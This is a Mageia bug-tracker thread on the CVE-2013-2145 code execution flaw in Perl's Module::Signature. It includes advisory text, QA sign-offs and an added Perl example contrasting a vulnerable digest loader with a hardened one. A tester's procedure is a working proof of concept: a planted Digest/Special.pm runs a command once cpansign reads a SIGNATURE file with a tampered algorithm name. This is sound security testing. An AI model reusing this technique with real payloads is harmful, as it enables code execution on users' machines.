Fedora has issued an advisory on June 9:
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html

Mageia 2 and Mageia 3 are also affected.
CC: (none) => shlomif
Whiteboard: (none) => MGA3TOO, MGA2TOO
Hi David, thanks for the report.

Updates pushed to Mageia 2, Mageia 3 and Mageia Cauldron:
http://pkgsubmit.mageia.org/

Regards,
-- Shlomi Fish
Thanks Shlomi! If anyone wants to provide a more descriptive CVE summary, feel free :o)

More info is here:
http://openwall.com/lists/oss-security/2013/06/05/16

Advisory:
========================

Updated perl-Module-Signature package fixes security vulnerability:

Arbitrary code execution vulnerability in Module::Signature before 0.72 (CVE-2013-2145).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2145
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html
========================

Updated packages in core/updates_testing:
========================
perl-Module-Signature-0.730.0-1.mga2
perl-Module-Signature-0.730.0-1.mga3

from SRPMS:
perl-Module-Signature-0.730.0-1.mga2.src.rpm
perl-Module-Signature-0.730.0-1.mga3.src.rpm
CC: (none) => jquelin
Version: Cauldron => 3
Assignee: jquelin => qa-bugs
Whiteboard: MGA3TOO, MGA2TOO => MGA2TOO
Testing complete MGA2 x86_64

Here is my testing procedure:

As root:
1) install perl-Module-Signature
2) as root, create /usr/lib/perl5/vendor_perl/{your_version}/Digest/Special.pm

   # cat Special.pm
   system("touch /tmp/evilFile");

As a normal user:
1) make sure you already have a gpg key as your normal user, or create one with gpg --gen-key
2) rm -f /tmp/evilFile #justInCase
3) Then:

   $ mkdir test-signature
   $ cd test-signature
   $ vim MANIFEST
   $ cat MANIFEST
   MANIFEST
   $ cpansign sign
   [...]
   $ ls
   MANIFEST  SIGNATURE
   $ cat SIGNATURE
   This file contains message digests of all files listed in MANIFEST,
   signed via the Module::Signature module, version 0.68.

   To verify the content in this distribution, first make sure you have
   Module::Signature installed, then type:

       % cpansign -v

   It will check each file's integrity, as well as the signature's
   validity. If "==> Signature verified OK! <==" is not displayed,
   the distribution may already have been compromised, and you should
   not run its Makefile.PL or Build.PL.

   -----BEGIN PGP SIGNED MESSAGE-----
   Hash: SHA1

   SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
   -----BEGIN PGP SIGNATURE-----
   Version: GnuPG v1.4.12 (GNU/Linux)

   iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
   XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
   o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
   15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
   tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
   7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
   =lX23
   -----END PGP SIGNATURE-----

Now we will alter this signature file, changing the
"SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST" line:

   [samuel.verschelde@tech009 test-signature]$ vim SIGNATURE
   [samuel.verschelde@tech009 test-signature]$ cat SIGNATURE
   This file contains message digests of all files listed in MANIFEST,
   signed via the Module::Signature module, version 0.68.

   To verify the content in this distribution, first make sure you have
   Module::Signature installed, then type:

       % cpansign -v

   It will check each file's integrity, as well as the signature's
   validity. If "==> Signature verified OK! <==" is not displayed,
   the distribution may already have been compromised, and you should
   not run its Makefile.PL or Build.PL.

   -----BEGIN PGP SIGNED MESSAGE-----
   Hash: SHA1

   Special a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
   -----BEGIN PGP SIGNATURE-----
   Version: GnuPG v1.4.12 (GNU/Linux)

   iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
   XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
   o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
   15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
   tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
   7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
   =lX23
   -----END PGP SIGNATURE-----

Now we run cpansign to verify the signature, thus tricking cpansign into executing our Special.pm evil script:

   [samuel.verschelde@tech009 test-signature]$ cpansign
   Unknown cipher: Special, please install Digest::Special
   Can't call method "add" on an undefined value at /usr/lib/perl5/vendor_perl/5.12.3/Module/Signature.pm line 601, <F> chunk 1.

There are errors, because I haven't created a proper Special.pm script, but this is enough for the test because:

   [samuel.verschelde@tech009 test-signature]$ ls /tmp/evilFile
   /tmp/evilFile

The evil action has worked.

Then install the update candidate, remove /tmp/evilFile, run cpansign again in the appropriate directory, and see that it hasn't created the evilFile. Then don't forget to remove that Special.pm you created.

   $ cpansign
   Malformed algorithm name: Special (should match /\w+\d+/) at /usr/lib/perl5/vendor_perl/5.14.2/Module/Signature.pm line 541.
Whiteboard: MGA2TOO => MGA2TOO has_procedure MGA2-64-OK
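The advisory and the test procedure above show the bug class behind CVE-2013-2145 from the outside: the algorithm token on a "ALGO HEX FILE" line of SIGNATURE is chosen by whoever wrote that file, and the unfixed module turned it into a Digest::<name> module to load, while the fixed package rejects it with "Malformed algorithm name". The following Perl is an added example, not Module::Signature's own code, showing the unchecked loader beside a hardened one that validates the token before any module is loaded and then verifies the listed digests. It goes a step beyond the fix's shape check by also applying an allow-list. The function names, the allow-list in %DIGEST_NAME, the in-memory MANIFEST content and the placeholder signature block are all assumptions constructed for the example.

```perl
#!/usr/bin/perl
# Added example (not Module::Signature's code): digest-line verification
# for a SIGNATURE file with the algorithm token validated up front.
use strict;
use warnings;
use Digest;

# Assumed allow-list: algorithm tokens we accept, mapped to the argument
# Digest->new() understands (all backed by core Digest::SHA / Digest::MD5).
my %DIGEST_NAME = (
    SHA1   => 'SHA-1',
    SHA256 => 'SHA-256',
    SHA512 => 'SHA-512',
    MD5    => 'MD5',
);

# Vulnerable shape, kept only for contrast and never called here: the token
# read from the signature body selects the module directly, so an unknown
# name ends up as require "Digest/<name>.pm", which is what the Special.pm
# test above relies on.
sub digest_object_unchecked {
    my ($algorithm) = @_;
    return Digest->new($algorithm);
}

# Hardened shape: reject the token before anything is loaded.
sub digest_object_checked {
    my ($algorithm) = @_;
    # 1. shape check, letters then digits and nothing else (the form the
    #    fixed package's "should match /\w+\d+/" message refers to), so no
    #    "::", "/" or ".." can reach the module loader
    $algorithm =~ /\A[A-Za-z]+\d+\z/
        or die "Malformed algorithm name: $algorithm\n";
    # 2. allow-list: only digests we deliberately support
    my $name = $DIGEST_NAME{$algorithm}
        or die "Unsupported digest algorithm: $algorithm\n";
    return Digest->new($name);
}

# Extract the "ALGO HEX FILE" lines from the clearsigned section.
sub parse_digest_lines {
    my ($signature_text) = @_;
    my @entries;
    my $in_body = 0;
    for my $line (split /\n/, $signature_text) {
        if ($line eq '-----BEGIN PGP SIGNED MESSAGE-----') { $in_body = 1; next }
        last if $line eq '-----BEGIN PGP SIGNATURE-----';
        next unless $in_body;
        next if $line =~ /^Hash:/ or $line !~ /\S/;
        my ($algo, $hex, $file) = split ' ', $line, 3;
        defined $file or die "Unparsable digest line: $line\n";
        push @entries, { algo => $algo, hex => $hex, file => $file };
    }
    return @entries;
}

# Check each listed file against the in-memory contents in %$files.
# Returns one "file: OK|MISMATCH|MISSING" string per entry.
sub verify_digests {
    my ($files, @entries) = @_;
    my @report;
    for my $e (@entries) {
        my $content = $files->{ $e->{file} };
        if (!defined $content) { push @report, "$e->{file}: MISSING"; next }
        my $got = digest_object_checked($e->{algo})->add($content)->hexdigest;
        push @report, "$e->{file}: " . ($got eq $e->{hex} ? 'OK' : 'MISMATCH');
    }
    return @report;
}

# --- constructed sample data -------------------------------------------
my %files = ( MANIFEST => "MANIFEST\nSIGNATURE\n" );
my $sha1  = Digest->new('SHA-1')->add($files{MANIFEST})->hexdigest;

# "..." stands in for the PGP signature block; gpg checking is out of scope here.
my $good = "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n"
         . "SHA1 $sha1 MANIFEST\n"
         . "-----BEGIN PGP SIGNATURE-----\n...\n-----END PGP SIGNATURE-----\n";
# Same body with the algorithm token swapped, as in the test procedure above.
(my $tampered = $good) =~ s/^SHA1 /Special /m;

print "$_\n" for verify_digests(\%files, parse_digest_lines($good));
eval { verify_digests(\%files, parse_digest_lines($tampered)) };
print "tampered file rejected before any module load: $@";
```

Run as a plain script; it needs only core modules. The good body reports "MANIFEST: OK", and the tampered body dies in digest_object_checked on the shape check, which is the point: the decision is made on the string alone, before Digest->new() and the require behind it ever see it. The allow-list is the stricter defence, since a well-formed name such as SHA1 still names a module on disk, and an allow-list keeps that set fixed by the verifier rather than by the signature file.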
Testing complete on Mageia 3 i586, following Stormi's procedure in comment 3. That's nice for once, to be able to reproduce a security vulnerability :)
Whiteboard: MGA2TOO has_procedure MGA2-64-OK => MGA2TOO has_procedure MGA2-64-OK MGA3-32-OK
Testing complete on Mageia 2 i586.
Whiteboard: MGA2TOO has_procedure MGA2-64-OK MGA3-32-OK => MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK
testing mga3 64
Testing complete mga3 64

Thanks for the procedure, Samuel.

Validating. Advisory uploaded.

Could sysadmin please push from 2 & 3 core/updates_testing to core/updates

Thanks!
Keywords: (none) => validated_update
Whiteboard: MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK => MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK mga3-64-ok
CC: (none) => sysadmin-bugs
http://advisories.mageia.org/MGASA-2013-0184.html
Status: NEW => RESOLVED
CC: (none) => boklm
Resolution: (none) => FIXED
CC: boklm => (none)